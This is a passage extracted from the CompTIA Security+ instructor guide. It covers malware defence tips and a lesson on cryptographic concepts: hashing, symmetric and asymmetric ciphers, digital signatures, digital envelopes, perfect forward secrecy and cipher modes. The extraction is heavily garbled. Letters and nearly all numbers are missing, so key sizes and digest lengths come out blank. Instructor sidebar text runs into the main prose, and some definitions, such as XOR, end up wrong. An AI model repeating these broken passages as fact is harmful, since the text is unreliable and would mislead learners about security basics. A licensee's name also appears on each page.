ollow these guidelines when you use security assessments to protect security systems
is time, revisit any
against social engineering and malware attacks content e amples that
• se training and education programs to help employees to recogni e how social they have uestions
about. If you have
engineering is e ective authority, intimidation, consensus, scarcity, familiarity, trust, used all the available
and urgency . time for this lesson
block, note the issues,
• se policies and procedures that hinder social engineers from eliciting information and schedule time for
or obtaining unauthori ed access. a review later in the
course.
• ducate users to recogni e phishing and pharming attempts, such as validating
domain names and identifying suspicious messages. Interaction
Opportunity
• se training and education programs to help employees recogni e types of malware ptionally, discuss
threat Tro an, , spyware, backdoor, bots, rootkits, and ransomware and the with students how
vectors by which malware can e ecute. they might have
e perience of social
• se security filters and limited privileges to restrict the ability of users to e ecute engineering or
infected files or scripts. malware attacks,
the impact they had,
• Consider implementing behavior based endpoint protection suites that can perform and how they were
resolved.
more e ective detection of fileless malware.

• Consider setting up a sandbo with analysis tools to investigate suspicious process

behavior.

• Consider using threat data feeds to assist with identification of command and
control networks.

esson Identifying Social Engineering and alware

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 5
Summarizing Basic
Cryptographic Concepts

LESSON INTRODUCTION Teaching

Tip
Assess and monitor activities utilize threat intelligence to identify potential attack This lesson starts
vectors detect malicious activity. The protect cybersecurity function aims to build the next block of
secure IT processing systems that e hibit the attributes of confidentiality, integrity, and the course, which
availability. Many of these secure systems depend wholly or in part on cryptography. is focused on the
protect function. The
A cryptographic system encodes data in such a way that only authorized persons first part of this will
can decode it. Cryptography is the basis for many of the security systems you will be cover IAM topics,
implementing and configuring. As an information security professional, you must and cryptography
have a good understanding of the concepts underpinning cryptographic algorithms underpins most of
these technologies.
and their implementation in secure protocols and services. All security personnel
must be able to contrast the di erent types of cryptographic ciphers, understand how
they can be used to apply data confidentiality, integrity, and availability, and describe
the weaknesses they may exhibit. A secure technical understanding of the subject
will enable you to explain the importance of cryptographic systems and to select
appropriate technologies to meet a given security goal.

Lesson Objectives
In this lesson, you will
• Compare and contrast cryptographic ciphers.

• Summarize cryptographic modes of operation.

• Summarize cryptographic use cases and weaknesses.

• Summarize other cryptographic technologies.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 96 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 5A
Compare and Contrast
Cryptographic Ciphers

Teaching EXAM OBJECTIVES COVERED

Tip 2.1 Explain the importance of security concepts in an enterprise environment (hashing only)
This topic covers the 2.8 Summarize the basics of cryptographic concepts
basic cryptographic
primitive types
hashing, symmetric
A cipher is the particular operations performed to encode or decode data. Modern
ciphers, and cryptographic systems make use of symmetric and asymmetric cipher types to encode
asymmetric ciphers. and decode data. As well as these cipher types, one way hash functions have an
Objective 2.8 is important role to play in many security controls. Being able to compare and contrast
covered over the the characteristics of these types of cryptographic ciphers and functions is essential for
course of all the topics you to deploy security controls for di erent use cases.
in this lesson.
It is easy for students
to become confused Cr pto raphic Concepts
about the di erent
types of cryptographic Cryptography (literally meaning "secret writing") has been around for thousands
systems, so allocate of years. It is the art of making information secure by encoding it. This stands in
plenty of time to opposition to the concept of security through obscurity. Security through obscurity
covering this topic. means keeping something a secret by hiding it. This is generally acknowledged to be
impossible or at least, high risk on any sort of computer network. ith cryptography,
Show Slide(s)
it does not matter if third parties know of the e istence of the secret, because they can
never know what it is without obtaining an appropriate credential.
Cryptographic
Concepts The following terminology is used to discuss cryptography
• Plaintext (or cleartext an unencrypted message.
Teaching
Tip • Ciphertext an encrypted message.
Note that in
cryptography there is • Cipher the process or algorithm used to encrypt and decrypt a message.
still some "obscurity"
involved as you have • Cryptanalysis the art of cracking cryptographic systems.
to control distribution
of the key. This is In discussing cryptography and attacks against encryption systems, it is customary
a simpler job than to use a cast of characters to describe di erent actors involved in the process of an
protecting the design attack. The main characters are
of the algorithm,
however. • Alice—the sender of a genuine message.
Passive eavesdropping
is traditionally • Bob—the intended recipient of the message.
performed by ve,
but we're just using • Mallory—a malicious attacker attempting to subvert the message in some way.
Mallory for simplicity.
There are three main types of cryptographic algorithm with di erent roles to play in
the assurance of the security properties confidentiality, integrity, availability, and non
repudiation. These types are hashing algorithms and two types of encryption ciphers
symmetric and asymmetric.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 97

ashin Al orithms Show Slide(s)

Hashing is the simplest type of cryptographic operation. A cryptographic hashing ashing Algorithms
algorithm produces a fi ed length string from an input plainte t that can be of any
length. The output can be referred to as a checksum, message digest, or hash, The Teaching
function is designed so that it is impossible to recover the plaintext data from the Tip
digest one way and so that di erent inputs are unlikely to produce the same output Hash functions are
(a collision). mostly used for
integrity (signatures
A hashing algorithm is used to prove integrity. or e ample, ob and Alice can compare and message digests)
the values used for a password in the following way and password storage
confidentiality .
1. Bob already has a digest calculated from Alice's plaintext password. Bob cannot
recover the plaintext password value from the hash. hile the names
of cryptographic
2. hen Alice needs to authenticate to ob, she types her password, converts it to a algorithms have been
removed from the
hash, and sends the digest to ob. certification ob ectives,
they are still present
3. ob compares Alice's digest to the hash value he has on file. If they match, he can in the acronyms list,
be sure that Alice typed the same password. and the injunction
on the acronyms list
As well as comparing password values, a hash of a file can be used to verify the is "Candidates are
integrity of that file after transfer. encouraged to review
the complete list
1. Alice runs a hash function on the setup.e e file for her product. he publishes the and attain a working
digest to her website with a download link for the file. knowledge of all listed
acronyms as part of a
2. ob downloads the setup.e e file and makes a copy of the digest. comprehensive exam
preparation program."
3. ob runs the same hash function on the downloaded setup.e e file and Conse uently, the
compares it to the reference value published by Alice. If it matches the value names of the main
published on the website, the integrity of the file can be assumed. products have been
retained.
4. Consider that Mallory might be able to substitute the download file for a The syllabus also uses
malicious file. Mallory cannot change the reference hash, however. the term checksum
for a message digest
5. This time, ob computes a hash but it does not match, leading him to suspect (under the forensics
that the file has been tampered with. objective) so we
are using that here
too. You might want
to note that hash
functions produce
a specific type of
checksum, but there
are others with
di erent properties,
such as a parity
checksum.

Confirming a file download using cryptographic hashes. (Images 1 .com.)

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 98 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

There are two popular implementations hash algorithms

• Secure Hash Algorithm (SHA)—considered the strongest algorithm. There are
variants that produce di erent si ed outputs, with longer digests considered more
secure. The most popular variant is A , which produces a bit digest.

• Message Digest Algorithm #5 (MD5) produces a bit digest. MD is not

considered to be uite as safe for use as A , but it might be re uired for
compatibility between security products.

Computing an S A value from a file. (Screenshot used with permission from icrosoft.)

Show Slide(s) ncr ption Ciphers and e s

ncryption Ciphers
hile a hash function can be used to prove the integrity of data, it cannot be used
and Keys to store or transmit data. The plaintext cannot be recovered from the digest. An
encryption algorithm is a type of cryptographic process that encodes data so that it can
Teaching be recovered, or decrypted. The use of a key with the encryption cipher ensures that
Tip decryption can only be performed by authorized persons.
Make sure students
understand the Substitution and Transposition Ciphers
di erence between
the cipher and the key. To understand how encryption works, it is helpful to consider simple substitution and
You could also transposition ciphers. A substitution cipher involves replacing units (a letter or blocks
mention that most of letters in the plainte t with di erent cipherte t. imple substitution ciphers rotate
types of encryption or scramble letters of the alphabet. or e ample, T an e ample of a Caesarian
make use of the cipher rotates each letter places so A becomes N for instance . The cipherte t
function.
ryyb Jbey means ello orld .
In contrast to substitution ciphers, the units in a transposition cipher stay the same in
plainte t and cipherte t, but their order is changed, according to some mechanism.
Consider how the cipherte t L L L D has been produced
H L O O L
E L W R D
The letters are simply written as columns and then the rows are concatenated to make
the ciphertext. It's called a rail fence cipher. All modern encryption uses these basic
techni ues of substitution and transposition, but in much more comple ways.

e s and ecret Ciphers

ncryption ciphers use a key to increase the security of the process. or e ample, if
you consider the Caesar cipher T , you should reali e that the key is . ou could
use to achieve a di erent cipherte t from the same method. The key is important
because it means that even if the cipher method is known, a message still cannot
be decrypted without knowledge of the specific key. This is particularly important in
modern cryptography. Attempting to hide details of the cipher (a secret algorithm)
amounts to "security by obscurity." Modern ciphers are made stronger by being open
to review cryptanalysis by third party researchers.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 100 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Stream and Block Ciphers

Stream and Block
There are two types of symmetric encryption stream ciphers and block ciphers.
Ciphers
tream Ciphers
Teaching
In a stream cipher, each byte or bit of data in the plainte t is encrypted one at a
Tip
time. This is suitable for encrypting communications where the total length of the
e will get to it in the
message is not known. The plaintext is combined with a separate randomly generated
ne t topic, but you
might want to point message, calculated from the key and an initiali ation vector I . The I ensures the
out here that various key produces a unique ciphertext from the same plaintext. The keystream must be
counter modes can be uni ue, so an I must not be reused with the same key. The recipient must be able to
used to turn AES into a generate the same keystream as the sender and the streams must be synchronized.
stream cipher. Stream ciphers might use markers to allow for synchronization and retransmission.
You might also want ome types of stream ciphers are made self synchroni ing.
to note that C is
an obsolete stream
cipher and the use
loc Ciphers
of ChaCha as a
modern stream
In a block cipher, the plainte t is divided into e ual si e blocks usually bit . If
cipher. These should there is not enough data in the plainte t, it is padded to the correct si e using some
not be required for the string defined in the algorithm. or e ample, a bit plainte t would be padded with
e am, but students an e tra bits to fit into bit blocks. ach block is then sub ected to comple
will encounter them transposition and substitution operations, based on the value of the key used.
regularly as security
professionals. The Advanced Encryption Standard (AES) is the default symmetric encryption cipher
for most products. asic A has a key si e of bits, but the most widely used
variant is A , with a bit key.

e en th
The range of key values available to use with a particular cipher is called the keyspace.
The keyspace is roughly equivalent to two to the power of the size of the key. Using a
longer key bits rather than bits, for instance makes the encryption scheme
stronger. You should realize that key lengths are not equivalent when comparing
di erent algorithms, however. ecommendations on minimum key length for any
given algorithm are made by identifying whether the algorithm is vulnerable to
cryptanalysis techniques and by the length of time it would take to "brute force" the
key, given current processing resources.

Show Slide(s) Asymmetric Encryption

Asymmetric
In a symmetric encryption cipher, the same secret key is used to perform both
Encryption encryption and decryption operations. ith an asymmetric cipher, operations are
performed by two di erent but related public and private keys in a key pair.
Teaching
ach key is capable of reversing the operation of its pair. or e ample, if the public key
Tip
is used to encrypt a message, only the paired private key can decrypt the cipherte t
Asymmetric ciphers
produced. The public key cannot be used to decrypt the cipherte t, even though it was
are mainly used for
authentication and non used to encrypt it.
repudiation. Another The keys are linked in such a way as to make it impossible to derive one from the
important use is key
exchange. A symmetric
other. This means that the key holder can distribute the public key to anyone he or she
encryption key is wants to receive secure messages from. No one else can use the public key to decrypt
encrypted by the client the messages; only the linked private key can do that.
and sent to the server.
The server decrypts the 1. Bob generates a key pair and keeps the private key secret.
key and that secret key
is then used to encrypt 2. ob publishes the public key. Alice wants to send ob a confidential message, so
messages sent between she takes a copy of Bob's public key.
server and client.
3. Alice uses Bob's public key to encrypt the message.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 101

4. Alice sends the ciphertext to Bob.

5. Bob receives the message and is able to decrypt it using his private key.

6. If Mallory has been snooping, he can intercept both the message and the public
key.

7. owever, Mallory cannot use the public key to decrypt the message, so the
system remains secure.

Asymmetric encryption. (Images 1 .com.)

Asymmetric encryption can be used to prove identity. The holder of a private key
cannot be impersonated by anyone else. The drawback of asymmetric encryption is
that it involves substantial computing overhead compared to symmetric encryption.
The message cannot be larger than the key si e. here a large amount of data is being
encrypted on disk or transported over a network, asymmetric encryption is inefficient.
Conse uently, asymmetric encryption is mostly used for authentication and non
repudiation and for key agreement and exchange. Key agreement/exchange refers
to settling on a secret symmetric key to use for bulk encryption without anyone else
Show Slide(s)
discovering it.

Public Key
u lic e Cr pto raph Al orithms Cryptography
Algorithms
Asymmetric encryption is often referred to as public key cryptography. Many public
key cryptography products are based on the RSA algorithm. on ivest, Adi hamir, Teaching
and Leonard Adleman published the A cipher in rsa.com . The A algorithm Tip
provides the mathematical properties for deriving key pairs and performing the
There's not much
encryption and decryption operations. This type of algorithm is called a trapdoor point trying to
function, because it is easy to perform using the public key, but difficult to reverse describe ECC without
without knowing the private key. mentioning A.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 102 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Elliptic curve cryptography (ECC) is another type of trapdoor function that can be
used in public key cryptography ciphers. The principal advantage of CC over A's
algorithm is that there are no known "shortcuts" to cracking the cipher or the math
that underpins it, regardless of key length. Conse uently, CC used with a key si e of
bits is very appro imately comparable to A with a key si e of bits.

SA key pair security depends on the difficulty of finding the prime factors of very large
integers (modular exponentiation). ECC depends on the discrete logarithm problem.
Cloud are have produced an excellent overview of the differences (blog.cloud are.com a-
relatively-easy-to-understand-primer-on-elliptic-curve-cryptography).

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 103

Review Activity:
Cryptographic Ciphers
Answer the following uestions

1. Which part of a simple cryptographic system must be kept secret—the

cipher, the ciphertext, or the key?

In cryptography, the security of the message is guaranteed by the security of the key.
The system does not depend on hiding the algorithm or the message (security by
obscurity).

2. Considering that cryptographic hashing is one-way and the digest cannot be

reversed, what makes hashing a useful security technique?

Because two parties can hash the same data and compare checksums to see if they
match, hashing can be used for data verification in a variety of situations, including
password authentication. ashes of passwords, rather than the password plainte t,
can be stored securely or e changed for authentication. A hash of a file or a hash code
in an electronic message can be verified by both parties.

3. Which security property is assured by symmetric encryption?

Confidentiality symmetric ciphers are generally fast and well suited to bulk encrypting
large amounts of data.

4. What are the properties of a public/private key pair?

Each key can reverse the cryptographic operation performed by its pair but cannot
reverse an operation performed by itself. The private key must be kept secret by the
owner, but the public key is designed to be widely distributed. The private key cannot
be determined from the public key, given a sufficient key si e.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 104 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 5B
Summarize Cryptographic
odes o peration

Teaching EXAM OBJECTIVES COVERED

Tip 2.8 Summarize the basics of cryptographic concepts
This topic moves
on from the basic
cryptographic types
A mode of operation is a means of using a cipher within a product to achieve a security
to showing how they
are used together goal, such as confidentiality or integrity. eing able to summari e modes of operation
in cryptographic will help you to implement and support security controls such as digital signatures and
implementations, such transport encryption.
as digital signatures
and transport
encryption. Digital Signatures
Show Slide(s) ublic key cryptography can authenticate a sender, because they control a private key
that encrypts messages in a way that no one else can. Public key cryptography can only
be used with very small messages, however. ashing proves integrity by computing
Digital ignatures
a unique checksum from input. These two cryptographic functions can be combined
Teaching to authenticate a sender and prove the integrity of a message. This usage is called a
Tip digital signature. The following process is used to create a digital signature using A
encryption
Digital signatures
combine public 1. The sender Alice creates a digest of a message, using a pre agreed hash
key cryptography algorithm, such as A , and then encrypts the digest using her private key.
with hashing
algorithms to provide 2. Alice attaches the digital signature to the original message and sends both the
authentication,
signature and the message to Bob.
integrity, and non
repudiation.
3. ob decrypts the signature using Alice's public key, resulting in the original hash.

4. Bob then calculates his own checksum for the document (using the same
algorithm as Alice) and compares it with Alice's hash.

If the two hashes are the same, then the data has not been tampered with during
transmission, and Alice's identity is guaranteed. If either the data had changed or a
malicious user Mallory had intercepted the message and used a di erent private key,
the digests would not match.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 105

essage authentication and integrity using digital signatures. (Images 1 .com.)

It is important to remember that a digital signature is a hash that is then encrypted using
a private key. ithout the encryption, another party could easily intercept the file and the
hash, modify the file and compute a new hash, and then send the modified file and hash
to the recipient. It is also important to realize that the recipient must have some means of
validating that the public key really was issued by Alice. Also note that digital signatures do
not provide any message confidentiality.

The Digital Signature Algorithm (DSA) is a slightly di erent format for achieving
the same sort of goal. D A uses elliptic curve cryptography CC rather than the A
cipher.

i ital n elopes and e chan e Show Slide(s)

Symmetric encryption is the only practical means of encrypting and decrypting Digital nvelopes and
large amounts of data bulk encryption , but it is difficult to distribute the secret key Key Exchange
securely. ublic key cryptography makes it easy to distribute a key, but can only be
used efficiently with small amounts of data. Therefore, both are used within the same Teaching
product in a type of key exchange system known as a digital envelope or hybrid Tip
encryption. A digital envelope allows the sender and recipient to exchange a symmetric Stress that asymmetric
encryption key securely by using public key cryptography encryption is slow,
and so is only used
1. Alice obtains a copy of Bob's public key. on small amounts of
data (signing hashes
2. Alice encrypts her message using a secret key cipher, such as A . In this conte t, or encrypting secret
the secret key is referred to as a session key. keys).

3. Alice encrypts the session key with Bob's public key.

4. Alice attaches the encrypted session key to the ciphertext message in a digital
envelope and sends it to ob.

5. Bob uses his private key to decrypt the session key.

6. Bob uses the session key to decrypt the ciphertext message.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 106 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ey exchange using a digital envelope. (Images 1 .com.)

Note that in this process, it is the recipient's public key that is used to perform
encryption and the recipient's private key that is used for decryption. The validity of the
whole digital envelope can be proved using a message authentication code.

In all these implementations, it is critical that the private key be kept secure and available
only to the authorized user.

Show Slide(s) i ital Certificates

Digital Certificates
hen using public private key pairs, a sub ect will make his or her public key freely
available. This allows recipients of his or her messages to read the digital signature.
Teaching imilarly, he or she uses the recipient's public key to encrypt a message via a digital
Tip envelope. This means that no one other than the intended recipient can read the
e will e plore
message.
certificates and I in The question then arises of how anyone can trust the identity of the person or server
more detail in the next
issuing a public key. ne solution is to have a third party, referred to as a certificate
lesson.
authority (CA), validate the owner of the public key by issuing the subject with a
certificate. The certificate is signed by the CA. If the recipient also trusts the CA, they
can also trust the public key wrapped in the sub ect's certificate. The process of issuing
and verifying certificates is called public key infrastructure (P I).

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 107

Perfect Forward Secrecy Show Slide(s)

hen using a digital envelope, the parties must e change or agree upon a bulk Perfect Forward
encryption secret key, used with the chosen symmetric cipher. In the original Secrecy
implementation of digital envelopes, the server and client e change secret keys, using
the server's A key pair to protect the e change from snooping. In this key e change Teaching
model, if data from a session were recorded and then later the server's private key Tip
were compromised, it could be used to decrypt the session key and recover the The terms "key
confidential session data. exchange" and "key
agreement" are often
This risk from A key e change is mitigated by perfect forward secrecy (PFS). PFS taken to mean the
uses i e ellman key agreement to create ephemeral session keys without same thing, but point
using the server's private key. Diffie ellman allows Alice and ob to derive the same out that there are
shared secret just by agreeing some values that are all related by some trapdoor di erent mechanisms.
ith key agreement,
function. In the agreement process, they share some of them, but keep others private. the client does not
Mallory cannot possibly learn the secret from the values that are exchanged publicly transmit an encrypted
(en.wikipedia.org wiki Diffie ellman key e change). The authenticity of session key to the
the values sent by the server is proved by using a digital signature. server. The client and
server use Diffie
ellman D to
derive the same secret
key value.
Note that in TLS
. , only cipher
suites are allowed.
A key e change is
deprecated. The A
algorithm can still
be used for signing,
however. The values
exchanged as part of
D need to be signed
to prove authenticity
and prevent a man in
the middle attack.

Using iffie- ellman to derive a secret value to use to generate a shared symmetric encryption
key securely over a public channel. (Images 1 .com.)

Using ephemeral session keys means that any future compromise of the server will not
translate into an attack on recorded data. Also, even if an attacker can obtain the key
for one session, the other sessions will remain confidential. This massively increases
the amount of cryptanalysis that an attacker would have to perform to recover an
entire "conversation."

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 108 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

PFS can be implemented using either the i e ellman phemeral mode or

EDH) or lliptic Cur e i e ellman phemeral mode C algorithms. To use
, the server and client must negotiate use of a mutually supported cipher suite.

In 01 , a eartbleed bug was discovered in the way some versions of OpenSS work that
allows remote users to grab 6 chunks of server memory contents (heartbleed.com). This
could include the private key, meaning that any communications with the server could be
compromised. The bug had been present for around two years. This illustrates the value of
P S, but ironically many servers would have been updated to the buggy version of OpenSS
to enable support for P S.

Show Slide(s) Cipher Suites and Modes of Operation

Cipher Suites and
In a protocol such as Transport Layer ecurity TL , the re uirements to both
Modes of Operation authenticate the identity of the server and to encrypt communications between the
server and client need to be fulfilled by separate cryptographic products and cipher
Teaching implementations. The combination of ciphers supported is referred to as a cipher
Tip suite. The server and client negotiate mutually compatible cipher suites as part of the
hile the syllabus TLS handshake.
no longer mentions
cipher block chaining o far, we have identified two parts of the cipher suite
(CBC; except as • A signature algorithm, used to assert the identity of the server's public key and
under CCMP and in
the acronym list , it
facilitate authentication.
is included here to
help to explain the
• A key exchange agreement algorithm, used by the client and server to derive the same
problems that arise bulk encryption symmetric key.
from padding and
the necessity of using The final part of a cipher suite determines the bulk encryption cipher. hen A
counter mode/stream is selected as the symmetric cipher, it has to be used in a mode of operation that
ciphers. supports a stream of network data.
The acronym list also
continues to list rarely Cipher Block Chaining (CBC) Mode
implemented modes,
such as ECB and CFB. The Cipher Block Chaining (CBC) mode applies an initiali ation vector I to the
opefully, students first plainte t block to ensure that the key produces a uni ue cipherte t from any
should not need to
given plainte t. The output of the first cipherte t block is then combined with the
know these, but you
may want to point next plaintext block using an XOR operation. This process is repeated through the full
them out. chain of blocks, which again ensures that no plainte t block produces the same
Note that in TL . , ciphertext. CBC needs to use padding to ensure that the data to encrypt is an exact
the signature and key multiple of the block size.
agreement algorithms
are no longer part of O is a logical operation that outputs 1 only when the inputs are 1 and 0.
the actual suite. The
signature algorithm
is provided via
the server's digital
certificate and key
agreement is always
Diffie ellman. Counter Mode
Counter mode makes the AES algorithm work as a stream cipher. Counter mode
applies an I plus an incrementing counter value to the key to generate a keystream.
The keystream is then 'ed to the data in the plainte t blocks. ach block can be
processed individually and conse uently in parallel, improving performance. Also,
counter modes do not need to use padding. Any unused space in the last block is
simply discarded.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 109

Authenticated Modes of Operation Show Slide(s)

Symmetric algorithms do not provide message integrity or authentication. The basic Authenticated Modes
C C and counter modes of operation are unauthenticated. hile a man in the middle of Operation
cannot decrypt them directly without the secret key, the cipherte ts are vulnerable to
arbitrary data being inserted or modified to break the encryption scheme, referred to Teaching
as a chosen ciphertext attack. Tip
Students should not
Authenticated Encryption need to recognize the
cipher suite names
A message authentication code (MAC) provides an authentication and integrity for the e am, but
mechanism by hashing a combination of the message output and a shared secret in practical terms
key. The recipient can perform the same process using his or her copy of the secret they would be highly
recommended to
key to verify the data. This type of authenticated encryption scheme is specified in a
learn them anyway,
cipher suite as separate functions, such as A C C with MAC A. nfortunately, not least because
the implementation of this type of authenticated mode in AES CBC is vulnerable to a TL . is reduced to
type of cryptographic attack called a padding oracle attack (docs.microsoft.com en us just three algorithms.
dotnet standard security vulnerabilities cbc mode). Conse uently, we
are including the
Authenticated Encryption with Additional Data (AEAD) relevant acronyms for
recognition purposes,
The weaknesses of CBC arising from the padding mechanism means that stream but not trying to
e plain the di erence
ciphers or counter modes are strongly preferred. These use Authenticated Encryption between, say, MAC
with Additional Data A AD modes of operation. In an A AD scheme, the associated and C C MAC.
data allows the receiver to use the message header to ensure the payload has not
been replayed from a di erent communication stream.
An A AD mode is identified by a single hyphenated function name, such as A CM or
A CCM. The ChaCha oly stream cipher has been developed as an alternative
to AES.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 110 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
ryptographic odes o peration
Answer the following uestions

1. What is the process of digitally signing a message?

A hashing function is used to create a message digest. The digest is then signed using
the sender's private key. The resulting signature can be decrypted by the recipient
using the sender's public key and cannot be modified by any other agency. The
recipient can calculate his or her own digest of the message and compare it to the
signed hash to validate that the message has not been altered.

2. In a digital envelope, which key encrypts the session key?

The recipient's public key (typically from the server's key pair).

3. True or False? Perfect forward secrecy (PFS) ensures that a compromise of a

ser er s pri ate e ill not also put copies o tra c sent to that ser er in
the past at risk of decryption.

True. PFS ensures that ephemeral keys are used to encrypt each session. These keys
are destroyed after use.

4. h does i e ellman underpin per ect or ard secrec

Diffie ellman allows the sender and recipient to derive the same value the session
key from some other pre agreed values. ome of these are e changed, and some kept
private, but there is no way for a snooper to work out the secret ust from the publicly
exchanged values. This means session keys can be created without relying on the
server's private key, and that it is easy to generate ephemeral keys that are di erent
for each session.

5. hat t pe o ul encr ption cipher mode o operation o ers the est

security?

enerally, counter modes implementing Authenticated ncryption with Additional Data

A AD . pecific e amples include A CM and ChaCha oly .

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 111

Topic 5C
Summarize Cryptographic Use
ases and eaknesses

EXAM OBJECTIVES COVERED Teaching

1. Given a scenario, analyze potential indicators to determine the type of attack Tip
2.8 Summarize the basics of cryptographic concepts Having established the
types of cryptographic
function and the use
There are many individual symmetric and asymmetric cipher algorithms and hash of hybrid encryption,
functions. Characteristics of these ciphers make them better suited to meeting this topic covers use
constraints, such as use on battery powered devices. ome of the ciphers and cases, limitations,
implementations of ciphers within products can exhibit weaknesses that make them and weaknesses.
unsuitable for use. It is important that you be able to summarize these use cases and e also look at the
cryptographic attacks
weaknesses so that you can deploy controls that are fit for purpose.
content examples
from objective 1.2.
Cryptography Supporting Authentication and Show Slide(s)
Non-Repudiation
Cryptography
A single hash function, symmetric cipher, or asymmetric cipher is called a
Supporting
cryptographic primitive. A complete cryptographic system or product is likely to Authentication and
use multiple cryptographic primitives, such as within a cipher suite. The properties Non epudiation
of di erent symmetric asymmetric hash types and of specific ciphers for each type
impose limitations on their use in di erent conte ts and for di erent purposes. Teaching
Tip
If you are able to encrypt a message in a particular way, it follows that the recipient
of the message knows with whom he or she is communicating that is, the sender This section and the
next aim to reinforce
is authenticated . This means that encryption can form the basis of identification, the content presented
authentication, and access control systems. in the previous topic. If
students have formed
a good understanding
of the way digital
signatures and hybrid
encryption support
these use cases, you
can skip this section
and the one on
confidentiality and
consider resiliency and
performance issues.

Encryption allows sub ects to identify and authenticate themselves. The sub ect could
be a person, or a computer such as a web server.

Lesson 5: Summarizing Basic Cryptographic Concepts | Topic 5C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 112 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Non repudiation is linked to identification and authentication. It is the concept that the
sender cannot deny sending the message. If the message has been encrypted in a way
known only to the sender, it follows that the sender must have composed it.
Authentication and non repudiation depend on the recipient not being able to encrypt
the message, or the recipient would be able to impersonate the sender. This means
that to support authentication and repudiation, recipients must be able to use the
cryptographic process to decrypt authentication and integrity data, but not to encrypt
it. This use case is supported by asymmetric encryption ciphers and public/private
key pairs.
To use a key pair, the user or server generates the linked keys. The private key is stored
securely and protected from use by others by the account password. It is critical that
only the user or server be able to use the private key. The public key is given to clients
or correspondents, usually in the form of a digital certificate.
hen the user or server needs to authenticate, it encrypts some agreed hashed data
using the private key and sends it to the client as a digital signature. The client should
be able to decrypt the signature using the public key and derive the same hash value.

Show Slide(s) Cr pto raph upportin Confidentialit

Cryptography
Cryptography removes the need to store or transfer messages over secure media. It
Supporting does not matter if a ciphertext is stolen or intercepted because the threat actor will
Confidentiality not be able to understand or change what has been stolen. This use of cryptography
fulfils the goal of confidentiality. or this use case, you cannot simply use asymmetric
encryption and private public key pairs, because the algorithm cannot encrypt large
amounts of data efficiently. or e ample, the A asymmetric cipher has a ma imum
message si e of the key si e in bytes minus . A key si e of bits allows a
ma imum message si e of bytes . The computational overhead of
using this type of algorithm to encrypt the contents of a disk or stream of network
traffic is far too high.
Therefore, bulk data encryption uses a symmetric cipher, such as A . A symmetric
cipher can encrypt and decrypt data files and streams of network traffic uickly. The
problem is that distributing a symmetric key securely is challenging. The more people
who know the key value, the weaker the confidentiality property is. The risks of a threat
actor obtaining the key grow e ponentially. Luckily, symmetric keys are only bits
or bits long, and so can easily be encrypted using a public key. Conse uently, most
cryptographic systems use both symmetric and asymmetric encryption.
ncryption supporting confidentiality is used for both data at rest file encryption and
data in transit transport encryption
• File encryption—the user is allocated an asymmetric cipher key pair. The private
key is written to secure storage—often a trusted platform module (TPM)—and is
only available when the user has authenticated to his or her account. The public
key is used to encrypt a randomly generated A cipher key. hen the user tries
to encrypt or decrypt files, the A cipher key is decrypted using the private key to
make it available for the encryption or decryption operation.

• Transport encryption—this uses either digital envelopes or perfect forward secrecy.

or TT , a web server is allocated a key pair and stores the private key securely.
The public key is distributed to clients via a digital certificate. The client and server
